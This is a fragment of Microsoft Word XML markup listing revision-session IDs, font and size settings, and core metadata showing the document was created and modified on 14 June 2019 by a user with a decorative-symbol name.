    <w:rsid w:val="53EF72B5"/>
    <w:rsid w:val="55AA2384"/>
    <w:rsid w:val="5B680C80"/>
    <w:rsid w:val="5D175394"/>
    <w:rsid w:val="5FBA753F"/>
    <w:rsid w:val="5FEA2982"/>
    <w:rsid w:val="6176288E"/>
    <w:rsid w:val="65C54D9C"/>
    <w:rsid w:val="66615CC3"/>
    <w:rsid w:val="67381AEB"/>
    <w:rsid w:val="6AB3440D"/>
    <w:rsid w:val="6DDE5D40"/>
    <w:rsid w:val="6F414FA2"/>
    <w:rsid w:val="70101DE6"/>
    <w:rsid w:val="718D2605"/>
    <w:rsid w:val="736318AF"/>
    <w:rsid w:val="73885FE0"/>
    <w:rsid w:val="746A2034"/>
    <w:rsid w:val="762D708B"/>
    <w:rsid w:val="76EA1DE5"/>
    <w:rsid w:val="775E5ADA"/>
    <w:rsid w:val="77F11FB9"/>
    <w:rsid w:val="794F5604"/>
    <w:rsid w:val="7AB70067"/>
    <w:rsid w:val="7B154A0E"/>
    <w:rsid w:val="7BB8093E"/>
    <w:rsid w:val="7CD01864"/>
    <w:rsid w:val="7D510AAC"/>
    <w:rsid w:val="7DF9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宋体" w:cstheme="minorBidi"/>
      <w:sz w:val="28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 w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32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2019-06-14T11:12:00Z</dcterms:created>
  <dc:creator>.ｏ°○.•°○•°゜</dc:creator>
  <cp:lastModifiedBy>.ｏ°○.•°○•°゜</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-14T16:06:55Z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